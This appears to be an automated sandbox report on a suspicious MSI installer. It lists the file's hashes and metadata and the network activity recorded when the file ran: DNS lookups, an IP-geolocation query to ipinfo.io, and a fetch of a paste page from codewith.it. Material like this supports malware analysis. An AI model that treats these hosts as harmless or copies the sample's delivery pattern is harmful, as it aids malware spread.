                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F8A879B8-DD71-4150-8A82-B310C0805644}, Number of Words: 10, Subject: Windows Installer, Author: Microsoft Windows, Name of Creating Application: Windows Installer, Template: ;1046, Comments: A base dados do instalador contém a lógica e os dados necessários para instalar o Windows Installer., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Aug 22 16:17:57 2024, Number of Pages: 200
                                                  Entropy (8bit):7.983012684293603
                                                  TrID:
                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                  File name:nf963-5d-qns6-w812.msi
                                                  File size:27'090'432 bytes
                                                  MD5:bfab767af344fa22cfadfd11144ab5fe
                                                  SHA1:8c2bc0fd1fabf0410e5122c2b5929c34f306545a
                                                  SHA256:5f75b66b8bb89295ff96bb25dc3d37c6b6f93ebc9507ef1c16ff5dc8cddbeef7
                                                  SHA512:e4d80f08c093e364075e1dcf04c9f83a66dd33a5035cec06d7c2b4dc50ea438a5b3155a3fc5e95de40b2129ef84694143a9148f9075821df569bcfa2d0b53892
                                                  SSDEEP:786432:+mWauXOZ+iiOixYW1tdMzzL+B+8io6I72Mz96bakT:+mcXOZIYitdMrkioYs0a
                                                  TLSH:F1573329B69BC626D51C057BE919FF0D047CFE23873041E7F2F879AE84B48C1A6B5A41
                                                  Icon Hash:2d2e3797b32b2b99
                                                  Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                  Aug 23, 2024 19:16:22.909847975 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.909854889 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.915118933 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.915153027 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.915182114 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.915189981 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.915314913 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.920376062 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925729036 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925759077 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925795078 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.925806999 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.925883055 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.930280924 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935126066 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935175896 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935183048 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.935195923 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.935240030 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.939408064 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943409920 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943440914 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943465948 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.943475008 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.943794012 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.947449923 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951608896 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951638937 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951667070 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.951673985 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.951715946 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.951723099 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.955744028 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.955801964 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.955809116 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.959410906 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.959470034 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.959481001 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.963614941 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:22.963681936 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:22.963694096 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:23.012603998 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.010200977 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010386944 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010688066 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010795116 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.010812998 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010843039 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010880947 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.010934114 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.010950089 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011517048 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011547089 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011565924 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.011570930 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.011626005 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.011632919 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012459040 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012501001 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012528896 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012558937 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.012583017 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.012590885 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013331890 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013355970 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013391972 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013418913 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013427019 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.013432980 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.013540030 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.015675068 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015726089 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015753984 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015759945 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.015764952 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.015850067 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.016014099 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.016100883 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.016145945 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.016452074 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.016489029 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017064095 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017092943 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017118931 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017118931 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017127037 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017426014 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017457008 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017513990 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017522097 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017573118 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017915010 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.017975092 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.017981052 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018300056 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018394947 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.018402100 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018655062 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018683910 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.018717051 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.018723965 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.019092083 CEST49740443192.168.2.4216.58.212.164
                                                  Aug 23, 2024 19:16:24.019098043 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.019619942 CEST44349740216.58.212.164192.168.2.4
                                                  Aug 23, 2024 19:16:24.019680023 CEST49740443192.168.2.4216.58.212.164
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Aug 23, 2024 19:16:16.346438885 CEST | 50381 | 53 | 192.168.2.4 | 1.1.1.1
                                                  Aug 23, 2024 19:16:16.406255007 CEST | 53 | 50381 | 1.1.1.1 | 192.168.2.4
                                                  Aug 23, 2024 19:16:18.484137058 CEST | 55248 | 53 | 192.168.2.4 | 1.1.1.1
                                                  Aug 23, 2024 19:16:18.492991924 CEST | 53 | 55248 | 1.1.1.1 | 192.168.2.4
                                                  Aug 23, 2024 19:16:19.328125954 CEST | 65086 | 53 | 192.168.2.4 | 1.1.1.1
                                                  Aug 23, 2024 19:16:19.399097919 CEST | 53 | 65086 | 1.1.1.1 | 192.168.2.4
                                                  Aug 23, 2024 19:16:20.352257013 CEST | 62240 | 53 | 192.168.2.4 | 1.1.1.1
                                                  Aug 23, 2024 19:16:20.360259056 CEST | 53 | 62240 | 1.1.1.1 | 192.168.2.4
                                                  Aug 23, 2024 19:16:21.019259930 CEST | 59573 | 53 | 192.168.2.4 | 1.1.1.1
                                                  Aug 23, 2024 19:16:21.027192116 CEST | 53 | 59573 | 1.1.1.1 | 192.168.2.4
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                  Aug 23, 2024 19:16:16.346438885 CEST | 192.168.2.4 | 1.1.1.1 | 0x1fe2 | Standard query (0) | codewith.it | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:18.484137058 CEST | 192.168.2.4 | 1.1.1.1 | 0xf202 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:19.328125954 CEST | 192.168.2.4 | 1.1.1.1 | 0xdb53 | Standard query (0) | www.fuhnwijude.com | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:20.352257013 CEST | 192.168.2.4 | 1.1.1.1 | 0x848f | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:21.019259930 CEST | 192.168.2.4 | 1.1.1.1 | 0x22b9 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                  Aug 23, 2024 19:16:16.406255007 CEST | 1.1.1.1 | 192.168.2.4 | 0x1fe2 | No error (0) | codewith.it | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:16.406255007 CEST | 1.1.1.1 | 192.168.2.4 | 0x1fe2 | No error (0) | codewith.it | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:18.492991924 CEST | 1.1.1.1 | 192.168.2.4 | 0xf202 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:19.399097919 CEST | 1.1.1.1 | 192.168.2.4 | 0xdb53 | No error (0) | www.fuhnwijude.com | fuhnwijude.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:19.399097919 CEST | 1.1.1.1 | 192.168.2.4 | 0xdb53 | No error (0) | fuhnwijude.com | | 198.20.110.106 | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:20.360259056 CEST | 1.1.1.1 | 192.168.2.4 | 0x848f | No error (0) | google.com | | 142.250.185.78 | A (IP address) | IN (0x0001) | false
                                                  Aug 23, 2024 19:16:21.027192116 CEST | 1.1.1.1 | 192.168.2.4 | 0x22b9 | No error (0) | www.google.com | | 216.58.212.164 | A (IP address) | IN (0x0001) | false
                                                  • codewith.it
                                                  • ipinfo.io
                                                  • www.fuhnwijude.com
                                                  • www.google.com
                                                  • google.com
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.4 | 49737 | 142.250.185.78 | 80 | 4820 | C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 23, 2024 19:16:20.366395950 CEST | 247 | OUT
                                                  GET / HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  Host: google.com
                                                  Aug 23, 2024 19:16:21.018255949 CEST | 804 | IN
                                                  HTTP/1.1 301 Moved Permanently
                                                  Location: http://www.google.com/
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-kLf5I84YGSpohA1bDwilMg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                  Permissions-Policy: unload=()
                                                  Date: Fri, 23 Aug 2024 17:16:20 GMT
                                                  Expires: Sun, 22 Sep 2024 17:16:20 GMT
                                                  Cache-Control: public, max-age=2592000
                                                  Server: gws
                                                  Content-Length: 219
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  1 | 192.168.2.4 | 49739 | 216.58.212.164 | 80 | 4820 | C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 23, 2024 19:16:21.033205032 CEST | 251 | OUT
                                                  GET / HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  Host: www.google.com
                                                  Aug 23, 2024 19:16:21.712377071 CEST | 935 | IN
                                                  HTTP/1.1 302 Found
                                                  Location: https://www.google.com/?gws_rd=ssl
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-f_yy60SEJRGAhctr6iS7kQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                  Permissions-Policy: unload=()
                                                  Date: Fri, 23 Aug 2024 17:16:21 GMT
                                                  Server: gws
                                                  Content-Length: 231
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Set-Cookie: AEC=AVYB7cpAq0GIpRy9NZo9DvJvUBBN_YmsGsCKv3vpUtvLYDCsdqWAVvUU9g; expires=Wed, 19-Feb-2025 17:16:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/?gws_rd=ssl">here</A>.</BODY></HTML>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | 4820 | C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-08-23 17:16:17 UTC | 256 | OUT
                                                  GET /p/zNgG4G HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  Host: codewith.it
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  2024-08-23 17:16:18 UTC | 788 | IN
                                                  HTTP/1.1 200 OK
                                                  Date: Fri, 23 Aug 2024 17:16:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding,User-Agent
                                                  set-cookie: PHPSESSID=e507afa8d2b5f20e6dfbba9571228bb7; path=/
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZL7YYbRVF%2B3WlUQGM1vbMgl6mMXF3YAYLcIw9gt%2BTrGS9jbgz%2BFP4uvKdh6aVYgrbx%2F2PsOw8rVh4YbKsjbB%2FbI40QOcMLcFn%2FJnafpH7kJx%2BLKog6xhUGEa7ShUhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b7cbfe088fc8c84-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-08-23 17:16:18 UTC | 581 | IN
                                                  Data Ascii: 7c9d<!DOCTYPE html><html lang="en"> <head> <title>AGOSTO by @psgtransportesbr - Codewith.it</title> <meta name="viewport" content="width=device-width, user-scalable=no"> <meta charset="UTF-8"> <meta name="description" conten
                                                  2024-08-23 17:16:18 UTC | 1369 | IN
                                                  Data Ascii: nguage" content=""><meta name="category" content="web development"><meta property="og:title" content="Codewith.it" /><meta property="og:site_name" content="Codewith.it" /><meta property="og:type" content="Utility" /><meta property="og:url" content=
                                                  2024-08-23 17:16:18 UTC | 1369 | IN
                                                  Data Ascii: (arguments);} gtag('js', new Date()); gtag('config', 'G-3FMJXZBGEP');</script> <script src="https://unpkg.com/monaco-editor@latest/min/vs/loader.js"></script> <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Outl
                                                  2024-08-23 17:16:18 UTC | 1369 | IN
                                                  Data Ascii: > <button class='topbar-icon micn' title='Show/Hide preview' id='HidePreviewBtn'> preview </button> <button class='topbar-icon micn ebutton' title='Command list' data-panel='cmdPanel'> keyboard </button> <button class='topb
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 72 2d 63 6f 6c 20 66 6c 65 78 2d 63 65 6e 74 65 72 20 72 65 6c 61 74 69 76 65 27 3e 0a 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 73 65 61 72 63 68 46 6f 72 6d 22 20 6d 65 74 68 6f 64 3d 27 70 6f 73 74 27 3e 0a 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 74 65 78 74 27 20 63 6c 61 73 73 3d 27 74 6f 70 62 61 72 2d 69 6e 70 75 74 27 20 69 64 3d 27 73 65 61 72 63 68 42 61 72 27 20 6e 61 6d 65 3d 27 73 65 61 72 63 68 76 61 6c 75 65 27 20 6d 61 78 6c 65 6e 67 74 68 3d 22 34 30 22 20 69 64 3d 27 27 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 27 43 65 72 63 61 2e 2e 2e 27 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 27 6f 66 66 27 20 74 69 74 6c 65 3d 27 53 65 61 72 63 68 20 73 6f 6d 65 74 68 69 6e 67 27 3e 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c
                                                  Data Ascii: r-col flex-center relative'> <form id="searchForm" method='post'> <input type='text' class='topbar-input' id='searchBar' name='searchvalue' maxlength="40" id='' placeholder='Cerca...' autocomplete='off' title='Search something'> <button cl
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 64 6f 63 73 3f 77 3d 63 73 73 5f 77 69 64 74 68 27 20 74 69 74 6c 65 3d 27 56 69 73 75 61 6c 69 7a 7a 61 20 72 65 66 65 72 65 6e 7a 61 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e 77 69 64 74 68 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 73 6d 61 6c 6c 20 6d 6c 2d 32 27 3e 49 6d 70 6f 73 74 61 20 6c 61 20 6c 61 72 67 68 65 7a 7a 61 20 64 69 20 75 6e 20 65 6c 65 6d 65 6e 74 6f 20 48 54 4d 4c 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 64 6f 63 73 3f 77 3d 68 74 6d 6c 5f 64 69 76 27 20 74 69 74 6c 65 3d 27 56 69 73 75 61 6c 69 7a 7a 61 20 72 65 66 65 72 65 6e 7a 61 27 20 74 61 72 67 65 74 3d 27
                                                  Data Ascii: ttps://codewith.it/docs?w=css_width' title='Visualizza referenza' target='_blank'>width</a><span class='small ml-2'>Imposta la larghezza di un elemento HTML</span></li><li><a href='https://codewith.it/docs?w=html_div' title='Visualizza referenza' target='
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 3c 2f 6c 69 3e 0a 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 78 70 6c 6f 72 65 48 65 61 64 65 72 27 3e 0a 20 20 20 20 3c 68 33 3e 0a 20 20 20 20 20 20 45 78 70 6c 6f 72 65 20 20 20 20 3c 2f 68 33 3e 20 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 27 65 78 70 6c 6f 72 65 27 20 74 69 74 6c 65 3d 27 65 78 70 6c 6f 72 65 20 70 72 6f 6a 65 63 74 73 20 61 6e 64 20 66 69 6c 65 73 27 3e 0a 20 20 20 20 20 20 46 69 6e 64 20 69 6e 73 70 69 72 61 74 69 6f 6e 3c 2f 61 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 64 69 76 69 64 65 72 20 67 72 6f 73 73 27 20 69 64 3d 22 66 69 6c 65 64 69 76 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 66 69 6c 65 73 62 72 6f 77 73 65 72 27 20
                                                  Data Ascii: </li> </ul> </div> <div class='exploreHeader'> <h3> Explore </h3> <a href='explore' title='explore projects and files'> Find inspiration</a> </div> <div class='divider gross' id="filediv"> <div class='filesbrowser'
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 6e 69 63 61 20 58 69 61 6f 6d 69 20 31 34 20 55 6c 74 72 61 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 63 6f 64 65 66 69 6c 65 27 3e 3c 69 66 72 61 6d 65 20 73 61 6e 64 62 6f 78 20 64 61 74 61 2d 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 65 6d 62 65 64 3f 70 3d 33 30 34 35 46 63 72 65 43 73 6a 68 26 70 72 65 76 69 65 77 3d 73 61 6e 64 62 6f 78 27 3e 3c 2f 69 66 72 61 6d 65 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 70 2f 33 30 34 35 46 63 72 65 43 73 6a 68 27 20 74 69 74 6c 65 3d 27 4f 70 65 6e 20 2d 20 56 69 73 75 61 6c 69 7a 7a 61 20 54 45 53 54 27 3e 54 45 53 54 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 63 6f 64 65 66 69 6c 65
                                                  Data Ascii: nica Xiaomi 14 Ultra</a></div><div class='codefile'><iframe sandbox data-src='https://codewith.it/embed?p=3045FcreCsjh&preview=sandbox'></iframe><a href='https://codewith.it/p/3045FcreCsjh' title='Open - Visualizza TEST'>TEST</a></div><div class='codefile
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 61 2d 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 65 6d 62 65 64 3f 70 3d 64 38 62 58 4b 7a 26 70 72 65 76 69 65 77 3d 73 61 6e 64 62 6f 78 27 3e 3c 2f 69 66 72 61 6d 65 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 70 2f 64 38 62 58 4b 7a 27 20 74 69 74 6c 65 3d 27 4f 70 65 6e 20 2d 20 56 69 73 75 61 6c 69 7a 7a 61 20 4a 53 20 53 74 72 75 74 74 75 72 65 20 64 61 74 69 20 65 20 66 75 6e 7a 69 6f 6e 69 20 65 73 32 27 3e 4a 53 20 53 74 72 75 74 74 75 72 65 20 64 61 74 69 20 65 20 66 75 6e 7a 69 6f 6e 69 20 65 73 32 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c
                                                  Data Ascii: a-src='https://codewith.it/embed?p=d8bXKz&preview=sandbox'></iframe><a href='https://codewith.it/p/d8bXKz' title='Open - Visualizza JS Strutture dati e funzioni es2'>JS Strutture dati e funzioni es2</a></div> </div> </div></div> <div> <
